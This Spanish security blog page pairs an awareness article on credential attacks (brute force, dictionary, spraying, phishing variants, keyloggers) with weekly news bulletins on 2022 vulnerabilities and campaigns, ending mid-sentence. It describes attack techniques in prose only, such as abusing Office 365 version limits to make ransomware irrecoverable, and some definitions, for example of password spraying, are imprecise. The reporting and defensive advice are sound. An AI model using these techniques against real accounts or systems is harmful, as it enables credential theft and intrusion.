Una credencial de acceso es básicamente un nombre de usuario y una contraseña asociada a esa persona y a los permisos de accesos que tiene otorgados para una aplicación, servicio o sistema. También puede considerarse como credencial de acceso un certificado de usuario, o cualquier otra forma o método de autenticación cuya finalidad es poder disponer de acceso a un recurso, como una aplicación o una página web o servicio. Las credenciales de acceso son empleadas a diario por todo tipo de perfil de usuario, tanto expertos en sistemas TIC como personas no habituadas a las nuevas tecnologías. Esto hace de ellas un blanco a atacar por parte de los ciberdelincuentes, que además requieren de estas credenciales para conseguir sus objetivos. Los delitos dirigidos a conseguir credenciales de acceso crecen cada año, implementando nuevas técnicas y mecanismos para tratar de obtener estas. Las credenciales de acceso son esenciales de cara a proteger la información de una organización y la personal, por lo que conviene tener claro qué ataques están enfocados a obtener estas y qué mecanismos y técnicas emplean. Ataques más habituales a contraseñas Uno de los ataques a contraseñas más habituales es el de fuerza bruta, consistiendo en adivinar la contraseña en base de la metodología ensayo y error. Este método comienza probando diferentes combinaciones con datos personales, recabados por otros medios o bien con datos aleatorios. Este tipo de acciones se automatizan mediante herramientas que facilitan la tarea y búsqueda. Foto: Mourizal Zativa / Unsplash Los ataques de diccionario son otro tipo de ataque a contraseñas. Estos aprovechan la mala praxis de usar una palabra como contraseña. Al igual que en los ataques de fuerza bruta, se emplean herramientas que permiten automatizar el proceso de búsqueda. Este ciberataque emplea diccionarios que son ficheros de texto que contienen palabras y caracteres que se emplean habitualmente como contraseñas. Existen múltiples diccionarios en internet, como por ejemplo el diccionario rockyou.txt, ampliamente usado. Si el ciberataque es muy dirigido contra alguien concreto, también se suele recopilar información de la víctima, como por ejemplo fechas de nacimiento, nombres de familiares, mascotas o lugares en los que ha vivido, etc. Y se crea un diccionario a medida con esas y combinaciones similares, para realizar el ciberataque, aprovechando la mala praxis de emplear contraseñas basadas en datos personales o gustos. ¿Qué hacer para evitar que las contraseñas sean vulnerables a estos ataques? Crear contraseñas robustas que cumplan las siguientes directrices: Al menos entre 10 y 12 caracteres, combinando los de distinto tipo (mayúsculas, minúsculas, números y símbolos); No se deben emplear: Palabras sencillas en cualquier idioma (palabras de diccionarios); Nombres propios, fechas, lugares o datos de carácter personal; Palabras que estén formadas por caracteres próximos en el teclado; Palabras excesivamente cortas. Evitar el uso de contraseñas formadas por elementos o palabras que puedan ser públicas o fácilmente adivinables (ej. nombre + fecha de nacimiento); Crear contraseñas más fuertes y robustas, totalmente distintas a otras, para el acceso a servicios o aplicaciones críticas. Errores más comunes en el uso de las contraseñas La reutilización de contraseñas (“credential stuffing”) es una debilidad que facilita que un ataque de fuerza bruta o de diccionario pueda tener éxito. La técnica de password spraying consiste en emplear un gran número de contraseñas robadas (de alguna brecha de seguridad) en un grupo de cuentas (por ejemplo, las de correo web de empleados de una empresa) para ver si puede obtener acceso donde se requiera. Estas búsquedas se automatizan con herramientas que limitan los intentos de accesos para no poner en notificación a los sistemas de alerta del sitio que se desea vulnerar. Foto: Ed Hardie / Unsplash Estos son algunas acciones que pueden ayudar en la respuesta ante estos ataques o para tratar de que una contraseña no sea vulnerable a ellos: No reutilizar contraseñas en ningún caso, especialmente aquellas que se empleen para accesos a sistemas críticos. Habilitar el MFA (múltiple factor de autenticación) o el 2FA (doble factor de autenticación) siempre que el sistema al que se accede lo permita. Considerar acceder mediante factores distintos al propio “usuario/contraseña”, tales como: Sistemas biométricos como la huella dactilar, iris, etc. Tokens criptográficos, por software o hardware Tarjetas de coordenadas Accesos por OTP (One time Password) Evitar usar la cuenta y correo corporativos para registrarse en servicios que no sean corporativos. Ingeniería social Los ataques de ingeniería social enfocados a la obtención de contraseña emplean diversas técnicas de manipulación con el fin de obtener información que ayude a obtenerlas y en algunos casos, obtener directamente las credenciales. Phishing, smishing, vishing y warshipping Estos tipos de ciberataques aprovechan la desinformación y la ingenuidad humana principalmente. Se hacen pasar, por diversos mecanismos y medios, por un gestor o agente de confianza (banco, correos, hacienda, etc.), de cara a solicitar las credenciales de la víctima. Para ello, emplean distintos vectores de entrada tales como emails, SMS, llamadas o dispositivos. Phishing: Técnica que consiste en el envío de un correo electrónico con un asunto urgente o llamativo (asuntos bancarios, agencia tributaria, Correos, etc.). En ese mensaje se añade un enlace o botón que conduce a un sitio web diseñado que suplantan con gran parecido a la web legítima de la entidad que dicen ser y solicitan que se ingrese las credenciales para iniciar sesión. Estos sitios web falsos registrarán las credenciales introducidas pasando así a manos de los atacantes y redirigirán a la victima a la página original de la empresa u organismo suplantado. Existen múltiples variantes del phishing como son el spear-phishing y whaling. Smishing: Técnica que consiste en el envío de un SMS por parte de un ciberdelincuente a un usuario simulando ser una entidad legítima —red social, banco, institución pública, etc. con el mismo propósito que en el caso del phishing. Vishing: Llamada telefónica que emplea técnicas de suplantación de identidad y llevando a cabo técnicas de ingeniería social y similar, busca obtener las credenciales del usuario, tal y como sucede en el phishing y smishing. Warshipping: Regalo tecnológico (habitualmente dispositivo USB o similar) infectado con malware que, al conectarse a nuestros sistemas y elementos, empleará distintos mecanismos para obtener las credenciales y otros datos y enviarlos al ciberdelincuente. También es viable incluir en este tipo los cebos, donde se regala un elemento USB infectado en conferencias, convenciones, o bien a través de sitios webs con ventanas emergentes, anunciado premios. Shoulder surfing Esta técnica consiste en espiar a la víctima en el momento que teclea sus credenciales, bien sea porque está en un entorno público o inseguro o por la destreza del ciberdelincuente de cara a poder percibir las credenciales que teclea. En algunos casos, se ganan la confianza del usuario suplantando la identidad de personal técnico o de confianza, haciendo que la víctima se relaje e introduzca las credenciales sin ningún miedo. Por ello, es conveniente ser consciente del entorno en el que se está, estando atento a cualquier actividad sospecha que pueda suceder alrededor. Ataque de dumpster diving Esta técnica tiene por objetivo obtener información buscándola en la basura de la víctima. Se suele buscar notas, cuadernos, anotaciones, que den lugar a ver el tipo de credenciales que se usan o alguna credencial anotada en alguna nota o cuaderno. Se recomiendan las siguientes pautas de cara a protegerse contra los ataques de ingeniería social enfocados a la obtención de credenciales: Usar el sentido común y ser precavidos en todo momento. Asistir a sesiones de formación y concienciación en seguridad digital. La primera línea de defensa es el usuario final. Evitar pulsar en enlaces que lleguen a través de SMS o correos. Los bancos por ejemplo no envían SMS del tipo que se usan en estos ataques. Si se desea acceder a estos servicios y webs, hacerlo por los canales y vías oficiales que ofrecen. Emplear accesos e inicios de sesión mediante biometría como por ejemplo el reconocimiento facial, huella dactilar, etc. Habilitar 2FA o MFA en todos los accesos que sea posible. Desconfiar de los regalos de desconocidos y chequearlos previamente con software de seguridad, bajo entornos seguros. Desconfiar de cualquier llamada telefónica que solicite credenciales de acceso. Otros ataques contra las credenciales Otros ciberataques contra las credenciales emplean software malicioso como son los keylogger. Un keylogger es un programa que permite extraer todo aquello que se teclee en el equipo infectado con este software malicioso. Los ciberdelincuentes los usan previamente infectando al equipo de la víctima mediante USB, por correo electrónico o cualquier vector de ataque conocido. Otro ciberataque que puede estar dirigido a la obtención de credenciales es el Man in the Middle (Hombre en el medio). Para ello, se intercepta la comunicación entre dos o más interlocutores, suplantando la identidad de uno u otro según interese, con el fin de ver y obtener información y modificarla a su antojo. Una vez interceptadas las comunicaciones, las respuestas recibidas en uno u otro extremo pueden haber sido manipuladas o no proceder del interlocutor legítimo. Por tanto, este podría utilizar en estos mensajes diversas técnicas de ingeniería social, enviar archivos adjuntos maliciosos para instalar software o utilizar suplantar al remitente con técnicas de spoofing para hacerse con las contraseñas de la víctima.
22 de junio de 2022
Boletín semanal de ciberseguridad, 13 — 17 de junio
Hertzbleed. Nuevo ataque de canal lateral contra procesadores AMD e Intel Investigadores de seguridad de varias universidades de Estados Unidos han descubierto un nuevo ataque de canal lateral que afecta a los procesadores de Intel y AMD, denominado Hertzbleed. Lo destacable de este ataque es que podría permitir a un atacante extraer claves criptográficas de servidores remotos. Esto se debe a que, en determinadas circunstancias, el sistema de escalado dinámico de frecuencia y voltaje (DVFS) de los procesadores modernos con arquitectura x86 depende de los datos que se procesan, permitiendo, en procesadores modernos, que el mismo programa pueda ejecutarse a una frecuencia de CPU diferente. Tanto Intel (CVE-2022-24436), como AMD (CVE-2022-23823), ya cuentan con sus correspondientes identificadores para esta vulnerabilidad y han publicado los correspondientes avisos de seguridad. Según los investigadores que han descubierto Hertzbleed, ninguna de las firmas planea publicar parches para estos fallos. Sin embargo, Intel y AMD han publicado medidas de mitigación. PACMAN. Nuevo ataque contra dispositivos Mac Investigadores de seguridad de MIT CSAIL han descubierto un nuevo ataque que permitiría evadir Pointer Authentication (PAC) en procesadores M1 de Apple. PAC es un mecanismo de seguridad por el cual se firman criptográficamente determinados punteros y que permite al sistema operativo detectar y bloquear cambios inesperados qué, de no ser localizados, podrían dar lugar a fugas de información o al compromiso del sistema. En concreto, este ataque permitiría a actores amenaza acceder al sistema de archivos y ejecutar código arbitrario en los equipos Mac vulnerables. Para ello, los atacantes primero deben localizar un fallo existente de escritura/lectura en memoria que afecte al software del dispositivo Mac de la víctima, el cual sería bloqueado por PAC y que podría aumentar la gravedad del fallo al lograr la evasión de autenticación de punteros. Además, sería necesario conocer el valor PAC de un puntero concreto del objetivo. Esta nueva técnica de ataque fue reportada a Apple en 2021, junto con una prueba de concepto, si bien desde la compañía indican que no supone un riesgo inmediato para los usuarios de Mac, ya que se necesita la explotación de otro fallo, no siendo posible eludir los sistemas de seguridad por sí mismo. Más info: https://pacmanattack.com/ Citrix corrige dos vulnerabilidades en ADM Citrix ha publicado un boletín de seguridad crítico donde corrige dos vulnerabilidades en Citrix Application Delivery Management (ADM). El primer fallo, catalogado como CVE-2022-27511, se debe a un control de acceso inadecuado, podría permitir a un atacante resetear la contraseña de administrador tras el reinicio del dispositivo, permitiendo el acceso mediante SSH con las credenciales de administrador por defecto. Además, Citrix ha corregido otro fallo de seguridad (CVE-2022-27512) que, si es explotado con éxito, podría dar lugar a una interrupción temporal del servidor de licencias de ADM, provocando que Citrix ADM no pueda emitir nuevas licencias o renovarlas. Ambos fallos afectan a las versiones Citrix ADM 13.1 antes de la 13.1-21.53 y Citrix ADM 13.0 antes de la 13.0-85.19. Desde la firma instan a los usuarios a actualizar Citrix ADM server y Citrix ADM agent lo antes posible. Servidores de Microsoft Exchange vulnerados para desplegar el ransomware BlackCat El equipo de inteligencia de amenazas de Microsoft 365 Defender ha informado acerca de dos incidentes de seguridad donde se habría desplegado el ransomware BlackCat. Por un lado, se detectó la explotación de un servidor Exchange sin parchear como vector de entrada. Tras este acceso inicial, los atacantes se desplazaron por la red afectada, robando credenciales y exfiltrando grandes cantidades de información para ser utilizada dentro de la doble extorsión. Tras dos semanas después del acceso inicial, se implementó el ransomware. Cabe mencionar que desde Microsoft no han informado acerca de qué vulnerabilidad habría sido explotada. Por otro lado, otro incidente tuvo como vector de entrada la utilización de credenciales comprometidas en un servidor de escritorio remoto con acceso a Internet, pudiendo tener posteriormente los atacantes acceso a contraseñas y otra información, e implementando en última instancia la carga útil de BlackCat para el cifrado de los datos. Funcionalidad en Office365 facilita el cifrado de archivos en la nube Investigadores de seguridad de Proofpoint han descubierto una funcionalidad en Office 365 que podría permitir a operadores de ransomware cifrar los archivos almacenados en SharePoint Online y OneDrive, haciéndolos irrecuperables si no se dispone de copias de seguridad o de la clave de descifrado del atacante. Los investigadores se han centrado en el estudio de estas dos aplicaciones cloud por ser las más usadas en entornos empresariales. El único requisito necesario que fijan tanto para SharePoint Online como para OneDrive es tener acceso inicial, lo cual se puede conseguir mediante el compromiso de la cuenta del usuario (mediante ataques de phishing, de fuerza bruta, etc.), engañándole para que autorice aplicaciones de OAuth de terceros que permitan acceder a este tipo de plataformas, o mediante el secuestro de sesiones, ya sea secuestrando la sesión web de un usuario conectado o secuestrando un token de la API para SharePoint y/o OneDrive. Una vez se accede, el ataque se basa en el aprovechamiento de la funcionalidad "AutoSave", la cual permite crear copias de seguridad en la nube de versiones antiguas cada vez que los usuarios editan sus archivos. Lo que hace el atacante es reducir el límite de versiones de los archivos que se pueden almacenar a un número muy reducido y cifran el archivo más veces del límite que se ha introducido. De esta forma, consiguen que las versiones de los archivos que se habían guardado de forma previa al ataque se hayan perdido y que únicamente estén disponibles las versiones cifradas en la cuenta en la nube. Desde Proofpoint habrían alertado a Microsoft, quien ha indicado que la funcionalidad funciona como debería y que las versiones antiguas de los archivos pueden recuperarse durante 14 días con la ayuda de Microsoft Support.
17 de junio de 2022
Boletín semanal de ciberseguridad, 6 — 10 de junio
LockBit amenaza a Mandiant tras vincularlos con Evil Corp Durante la tarde del 6 de mayo, el grupo de ransomware LockBit 2.0 anunciaba en su página de publicaciones de la dark web el supuesto compromiso de la firma de ciberseguridad Mandiant y su intención de publicar unas horas después un total de 356.841 archivos supuestamente robados a la firma. La publicación incluía un archivo denominado “mandiantyellowpress.com.7z”, que estaría relacionado con el dominio registrado ese mismo día, mandiantyellowpress[.]com, que redireccionaba en ese momento a ninjaflex[.]com. Las amenazas de LockBit se producían tras la publicación por parte de Mandiant de un artículo en el que indicaban que el grupo de origen ruso Evil Corp habría comenzado a utilizar el ransomware LockBit en sus objetivos para evadir las sanciones estadounidenses. Desde que se conocía la amenaza, desde Mandiant han mantenido en todo momento que no contaban con evidencias de que se hubiese producido ningún tipo de intrusión, pero indicaban que se encontraban monitorizando la situación. Una vez publicados los datos, según reporta el medio Bleeping Computer que los ha podido analizar, se confirma que no se habría producido ningún tipo de compromiso. Lo que han publicado desde LockBit es un mensaje en el que niegan las acusaciones realizadas por lo que denominan “prensa amarillista” (refiriéndose a Mandiant) sobre una posible relación entre LockBit y Evil Corp. El grupo indica que los scripts y herramientas para realizar ataques están disponibles de forma pública y pueden ser utilizados por cualquier usuario, de forma que una similitud entre las herramientas utilizadas por dos grupos no significa que se puedan vincular a una identidad única. Asimismo, en su mensaje incluyen una línea final desvinculándose de cualquier tipo de ideología política o servicio especial de cualquier país. Más info: https://www.bleepingcomputer.com/news/security/mandiant-no-evidence-we-were-hacked-by-lockbit-ransomware/ Symbiote: nuevo y sigiloso malware contra sistemas Linux Investigadores de BlackBerry e Intezer publicaron ayer información sobre un malware de Linux al que han denominado Symbiote. El malware, detectado originalmente en ataques al sector financiero de Latinoamérica en noviembre de 2021, destaca por sus capacidades altamente avanzadas a la hora de ocultarse y esconder procesos. Esto lo consigue, en parte, al no constar de un ejecutable en sí mismo, si no que se trata de una librería de objeto compartido que se carga en todos los procesos en ejecución mediante la directiva LD_PRELOAD, tras lo que facilita al atacante funciones rootkit, capacidades de robo de contraseña y acceso remoto. Al cargarse en numerosos procesos, el malware puede manipular las respuestas de distintas herramientas y funciones del sistema, permitiendo que usuarios e investigadores solo vean una versión sesgada de los resultados que buscan. Para ello, utiliza, entre otros, la función Berkeley Packet Filter, observada en puertas traseras desarrolladas por Equation Group (NSA) y que permite esconder tráfico malicioso y determinar qué paquetes son visibles cuando un administrador intenta capturar tráfico. Más info: https://www.intezer.com/blog/research/new-linux-threat-symbiote/ Ataques contra empresas de telecomunicaciones y proveedores de servicios de red Las agencias estadounidenses NSA, CISA y FBI, publicaron un aviso conjunto de seguridad alertando sobre la detección de ataques perpetrados por actores maliciosos contra empresas de telecomunicaciones y proveedores de servicios de red a nivel global. Según detallan, esta campaña está llevándose a cabo mediante la explotación de vulnerabilidades existentes, principalmente en dispositivos de red, señalando hasta un total de 16 fallos de seguridad repartidos en diferentes marcas. Asimismo, el aviso destaca que, al conseguir un punto de apoyo inicial en una organización de telecomunicaciones o proveedor de servicios de red, estos actores maliciosos pueden identificar usuarios y sistemas críticos encargados de mantener la seguridad de las infraestructuras críticas de un país. En relación a la atribución de estas campañas, la alerta no ha identificado a un actor concreto que haya llevado a cabo estas intrusiones, denota de ello que el objetivo de la misma es instar a todas las organizaciones a parchear el listado de vulnerabilidades y aplicar las medidas de mitigación facilitadas con el fin de prevenir posibles incidentes de seguridad. Más info: https://www.cisa.gov/uscert/ncas/alerts/aa22-158a Campaña de espionaje de larga duración del actor Aoqin Dragon El equipo de investigadores de SentinelLabs ha publicado una investigación en la que informan sobre el descubrimiento de una APT vinculada a un estado, denominada Aoqin Dragon, y que habría estado realizando campañas de espionaje sin ser detectada durante 10 años. En concreto, este nuevo actor habría desarrollado su actividad contra organizaciones gubernamentales, educativas y compañías del sector de las telecomunicaciones, situadas todas ellas geográficamente en el sudeste asiático. Según los analistas, Aoqin Dragon habría desarrollado tres importantes mecanismos de infección entre sus TTPs; entre 2012 y 2015 emplearon campañas de malspam con documentos office adjuntos que explotaban las vulnerabilidades CVE-2012-0158 y CVE-2010-3333; entre 2016 y 2017 su vector de entrada consistía en ofuscar ejecutables maliciosos enmascarados en iconos de antivirus falsos; y desde 2018, utilizan un archivo de acceso directo de disco extraíble que al ejecutarse permite la inyección de código malicioso. Asimismo, Aoqin Dragon destaca por utilizar dos backdoors, Heyoka y Mongall, para exfiltrar información y permitir la comunicación con las redes de sus víctimas. Más info: https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/ Actualizaciones, PoCs y explotación activa de vulnerabilidad 0-day en Atlassian Después de que Atlassian publicara la semana pasada una alerta de seguridad sobre la vulnerabilidad 0-day CVE-2022-26134 en sus productos Confluence Server y Data Center, la compañía publicó el viernes por la tarde una actualización para corregir dicho fallo ante la proliferación de intentos de explotación de la misma. Desde Atlassian se ha instado a los clientes a actualizar a las versiones 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, y 7.18.1 de sus productos cuanto antes, y han publicado también medidas de mitigación temporales para aquellos que no puedan actualizar su software inmediatamente. El mismo viernes se hicieron públicos varios exploits fáciles de implementar y que mostraban como aprovechar la vulnerabilidad para crear nuevas cuentas de administrador, forzar peticiones DNS, recopilar información y crear shells inversas, detectándose desde entonces numerosos intentos de explotación, tal y como recogen los investigadores de Grey Noise. Más info: https://www.bleepingcomputer.com/news/security/exploit-released-for-atlassian-confluence-rce-bug-patch-now/
10 de junio de 2022
Boletín semanal de ciberseguridad, 28 de mayo — 3 de junio
Rápida evolución de la botnet EnemyBot Desde su descubrimiento el pasado mes de marzo por parte de investigadores de Securonix, la botnet conocida como EnemyBot, centrada en la realización de ataques de DDoS, no ha cesado de expandirse gracias sobre todo a la incorporación de exploits para vulnerabilidades críticas recientes en servidores web, sistemas de gestión de contenido, dispositivos IOT o dispositivos Android. Ya en abril, las muestras analizadas por Fortinet evidenciaban la integración de la explotación de más de 12 vulnerabilidades para explotar fallos en la arquitectura de los procesadores. Ahora, un nuevo informe de AT&T Labs informa de la detección de una nueva variante en la que se han añadido exploits para 24 vulnerabilidades, la mayor parte de ellas críticas y, algunas de las cuales no cuentan ni siquiera con un CVE asignado. Entre los fallos cabe destacar la incorporación de exploits para fallos recientes destacados como los conocidos en VMWare mayo (CVE-2022-22954), Spring (CVE-2022-22947) o BIG-IP (CVE-2022-1388). Esta amenaza se ha atribuido al grupo Keksec, especializado en la construcción de botnets desde 2016. Además, el código del malware se ha publicado en un repositorio de GitHub haciéndolo accesible a otros actores amenaza. Gracias a su publicación se ha podido confirmar que se trata de una amenaza construida a partir del código de múltiples botnets (Mirai, Qbot o Zbot), lo que la convierte en una amenaza más potente y ajustable. La rápida evolución de EnemyBot plantea la necesidad de evaluar de cerca cómo progresan otros proyectos de este grupo como son Tsunami, Gafgyt, DarkHTTP, DarkIRC o Necro. Más info: https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers Mozilla corrige vulnerabilidades en sus productos Mozilla ha lanzado una nueva actualización de seguridad para corregir varias vulnerabilidades que afectan a su gestor de correo Thunderbird y a los navegadores Firefox y Firefox ESR. Ninguno de los fallos corregidos ha sido identificado con severidad crítica, pero si se han corregido numerosas vulnerabilidades catalogadas con criticidad alta. Cabe indicar que el aprovechamiento de estos fallos por un agente amenaza remoto podría derivar en los siguientes impactos: ejecución remota de código, evasión de restricciones de seguridad, revelación de información sensible, falsificación, denegación de servicio y manipulación de datos. Desde Mozilla, se recomienda actualizar a las siguientes versiones de sus productos Firefox 101, Firefox ESR 91.10 y Thunderbird 91.10 para mitigar las vulnerabilidades. Más info: https://www.mozilla.org/en-US/security/advisories/ Killnet vuelve a amenazar a entidades italianas El CSIRT de Italia ha emitido una alerta en la que apunta a la existencia de riesgos de posibles ataques inminentes contra entidades públicas nacionales, entidades privadas que prestan un servicio de utilidad pública o entidades privadas cuya imagen se identifica con el país de Italia. Este aviso se produce tras el emitir el grupo hacktivista Killnet un comunicado en su canal de Telegram en el que incita a realizar ataques de forma masiva y sin precedentes contra Italia. No es la primera vez que el grupo muestra interés en este país, contra el que ya realizó ataques de denegación de servicio el pasado mes de mayo. Para la consecución de sus intenciones, Killnet ha anunciado el pasado 24 de mayo la operación Panopticon, en la que hacen un llamamiento a los usuarios para que formen parte del grupo y a los que facilitarán herramientas para la realización de los ataques. El nombre de la operación, según han indicado, hace referencia a un tipo de construcción cuyo diseño hace que se pueda observar la totalidad de una estructura desde su interior y desde un único punto. En relación con el nombre utilizado, el medio Bleeping Computer apunta a que es posible que los DDoS sean el objetivo principal pero que Killnet pueda querer que los esfuerzos se centren en paliar este tipo de ataques en lugar de en remediar otro tipo ciberataques, insinuando quizá algún tipo de fuga de información con el nombre utilizado. Finalmente, durante el día de ayer medios italianos informaban sobre la interrupción de los servicios de varias páginas de servicios como la policía estatal italiana y los Ministerios de Asuntos Exteriores y el de Defensa, aunque el grupo no ha reclamado la autoría de tales hechos por el momento. Más info: https://www.bleepingcomputer.com/news/security/italy-warns-organizations-to-brace-for-incoming-ddos-attacks/ 0-day en Confluence activamente explotado Atlassian ha publicado un aviso de seguridad para alertar de la explotación activa de una vulnerabilidad 0-day en Confluence para la cual no hay aun parches disponibles. Esta vulnerabilidad, catalogada como CVE-2022-26134 y con un riesgo crítico, permite la ejecución remota de código no autenticado en Confluence Server y Confluence Data Center (pendiente confirmar si en todas las versiones, pero posiblemente así sea). La explotación de esta vulnerabilidad fue detectada por el equipo de Volexity durante la investigación de un incidente de seguridad el pasado fin de semana en que observaron que, tras el acceso inicial mediante la explotación de este 0-day, los atacantes implementaron una copia en memoria de BEHINDER, un servidor web de código abierto que provee al atacante de capacidades como webshells en memoria y soporte integrado para la interacción con Meterpreter y Cobalt Strike. Una vez implementado BEHINDER, los atacantes utilizaron la webshell en memoria para implementar otras dos webshells adicionales en el disco: CHINA CHOPPER y otra shell de carga de archivos personalizada. Desde Atlassian recomiendan a los clientes restringir el acceso desde Internet a las instancias de los productos afectados, y deshabilitar las instancias tanto en Confluence Server como en Data Center. Asimismo, desde Atlassian señalan que aquellos que clientes que utilicen Confluence alojado en Atlassian Cloud no estarían afectados Más info: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
3 de junio de 2022
Boletín semanal de ciberseguridad, 21—27 de mayo
Vulnerabilidad sin corregir en PayPal El investigador de seguridad H4x0r-DZ ha dado a conocer una vulnerabilidad sin corregir en el servicio de transferencia de dinero de PayPal que podría permitir a los atacantes engañar a las víctimas para robarles el dinero completando transacciones dirigidas mediante la realización de ataques de clickjacking. Esta técnica permite a un atacante engañar a un usuario para que haga clic en elementos aparentemente inofensivos de una página web con fines fraudulentos: descargar malware, redirigirlos a sitios web maliciosos o revelar información sensible. El investigador descubrió que un endpoint de paypal[.]com/agreements/approve, diseñado para acuerdos de facturación, y que únicamente debería permitir tokens del tipo billingAgreementToken, permitía realmente recibir otro tipo de token. Ello permitiría a un atacante incluir un iframe específico, que provoca que una víctima que ha iniciado sesión en el sitio web transfiera sus fondos a una cuenta de PayPal controlada por el atacante simplemente con hacer clic en un botón. El investigador ha decidido publicar la prueba de concepto, después de notificar el pasado mes de octubre de 2021 el fallo a la compañía y no haber recibido ningún tipo de compensación o solución para el mismo por parte de PayPal. Más info: https://medium.com/@h4x0r_dz/vulnerability-in-paypal-worth-200000-bounty-attacker-can-steal-your-balance-by-one-click-2b358c1607cc Spyware Predator distribuido mediante la explotación de 0-days Investigadores del grupo de análisis de amenazas de Google (TAG), han revelado los detalles de la utilización de nuevos 0-days en Chrome y Android para la distribución del spyware conocido como Predator, una herramienta comercial de ciberespionaje desarrollada por Cytrox. En concreto, los investigadores hablan de tres campañas distintas. La primera campaña se detectaba en agosto de 2021 y habría explotado una vulnerabilidad en Chrome para redirigir a SBrowser (CVE-2021-38000 CVSSv3 6.1). La segunda campaña daba comienzo en septiembre de 2021 y explotaba varias vulnerabilidades en Chrome para escapar del sandbox del navegador (CVE-2021-37973 CVSSv3 9.8 y CVE-2021-37976 CVSSv3 6.5). Finalmente, la tercera campaña data de octubre de 2021 e implica la utilización de 0-days en Chrome y Android (CVE-2021-38003 CVSSv3 8.8 y CVE-2021-1048 CVSSv3 7.8). A pesar de explotar 0-days distintos, la base de las campañas era la misma. Los atacantes distribuían enlaces “one-time link” (válidos solo una vez y que caducan a las 24 horas) suplantando servicios de acortadores de URL a usuarios de Android, mediante correo electrónico, desde los que distribuían los exploits. El objetivo de las campañas era la distribución del malware de Android denominado ALIEN, encargado de descargar posteriormente el spyware Predator. En cuanto a la atribución de las campañas, los investigadores apuntan a que los actores detrás de las campañas estarían respaldados por gobiernos y concretamente, apuntan al menos a los de Egipto, Armenia, Grecia, Madagascar, Costa de Marfil, Serbia, España e Indonesia. Sus conclusiones van en línea con las investigaciones realizadas desde CitizenLab en diciembre de 2021. Más info: https://blog.google/threat-analysis-group/protecting-android-users-from-0-day-attacks/ Distribución de Cobalt Strike mediante PoCs falsas Investigadores de seguridad de Cyble han descubierto que agentes amenaza habrían utilizado pruebas de concepto falsas de dos vulnerabilidades recientes en Windows para infectar a sus víctimas con Cobalt Strike. En concreto, los atacantes publicaron en GitHub PoCs maliciosas para las vulnerabilidades de ejecución remota de código CVE-2022-24500 y CVE-2022-26809, ambas corregidas por Microsoft el pasado mes de abril. Los dos repositorios pertenecían al mismo usuario de GitHub, denominado "rkxxz", cuya cuenta y repositorios ya han sido eliminados. El objetivo de este tipo de prácticas, cada vez más habituales, suelen ser individuos relacionados con la seguridad de la información. Según el análisis realizado por Cyble, el malware utilizado en esta campaña es una aplicación .NET que muestra por pantalla un mensaje falso sobre el intento de explotación de la vulnerabilidad, ejecutando posteriormente comandos en PowerShell para la descarga del beacon de Cobalt Strike. Más info: https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/ Vulnerabilidad 0-day en Tails Tails ha emitido un aviso de seguridad donde alertan que habrían localizado una vulnerabilidad en su versión Tails 5.0 que afectaría a los usuarios que utilicen la distribución de Linux para acceder al navegador de Tor. Por ello recomiendan que no se use Tor hasta el próximo 31 de mayo, cuando se lanzará la actualización a la versión 5.1. Este fallo está relacionado con el aviso de seguridad que emitía Mozilla donde corregía dos vulnerabilidades críticas que afectaban a su gestor de correo Thunderbird y al navegador Firefox. Estos fallos fueron clasificados con los identificadores CVE-2022-1529 y CVE-2022-1802, y estaban relacionados con un error en el motor de JavaScript, el cual es también utilizado por Tor. Tails establece que, de ser aprovechada, podría permitir a un atacante obtener información confidencial como contraseñas, mensajes privados, entre otros, si bien el cifrado de las conexiones empleado por Tor para mantener el anonimato del usuario, no se habría visto afectado. Desde Tails recomiendan reiniciar el sistema, y afirman que Mozilla habría detectado actividad relacionada con la explotación de estos fallos. Más info: https://tails.boum.org/security/prototype_pollution/index.en.html
27 de mayo de 2022
Boletín semanal de ciberseguridad, 13—20 de mayo
VMware corrige vulnerabilidades críticas en varios de sus productos VMware ha publicado un aviso de seguridad con el fin de corregir una vulnerabilidad crítica de omisión de autenticación que afecta a varios de sus productos. Identificado como CVE-2022-22972 y CVSSv3 9.8, el fallo consiste en una omisión de autenticación que afecta a usuarios del dominio local y permitiría a un atacante con acceso de red a la interfaz de usuario, obtener acceso de administrador sin necesidad de autenticarse. Asimismo, VMware también ha lanzado parches para una segunda vulnerabilidad grave de escalada de privilegios locales (CVE-2022-22973 – CVSSv3 7.8) que podría permitir a un actor amenaza elevar sus permisos a 'root'. Ambos errores afectan a los productos VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation y vRealize Suite Lifecycle Manage. Adicionalmente, la publicación de estos fallos ha provocado que entidades como la CISA hayan emitido durante esta semana directivas de emergencia a múltiples agencias federales, instando a actualizar o eliminar urgentemente los productos VMware de sus redes antes del próximo lunes, debido a un mayor riesgo de ataques. Por su parte, VMware ha facilitado enlaces de descarga de parches e instrucciones de instalación en su sitio web de base de conocimiento, así como soluciones provisionales en caso de no ser posible actualizar de inmediato. Más info: https://www.vmware.com/security/advisories/VMSA-2022-0014.html Nueva campaña contra servidores SQL El equipo de Security Intelligence de Microsoft ha compartido mediante su perfil de Twitter una nueva campaña que habrían descubierto recientemente, la cual estaría afectando a servidores SQL y destacaría por el uso del LOLBin sqlps.exe. Para el acceso inicial al servidor SQL, han observado el empleo de ataques de fuerza bruta. Además, según describen, una vez comprometido el servidor, el actor de amenaza utiliza sqlps.exe, herramienta de Windows empelada para el inicio y uso de PowerShell en relación con instancias SQL, para lograr persistencia, ejecutando comandos de reconocimiento y modificando el modo de inicio del servidor a LocalSystem. Asimismo, los atacantes usan sqlps.exe para tomar el control del servidor creando una nueva cuenta con permisos de administrador, lo que les permite inyectar payloads en el sistema. URL: https://twitter.com/MsftSecIntel/status/1526680337216114693 Incremento de actividad del malware XorDD Investigadores de Microsoft han publicado un análisis del troyano dirigido contra sistemas Linux conocido como XorDDoS, donde exponen que habrían detectado un incremento de actividad durante los últimos 6 meses. XorDDoS, activo desde al menos 2014, debe su nombre al cifrado XOR utilizado para sus comunicaciones con el servidor Command & Control, así como a su tipo de ataque más característico, siendo este las denegaciones de servicio distribuidas (DDoS). Para este fin, XorDDoS, suele centrar su actividad en el 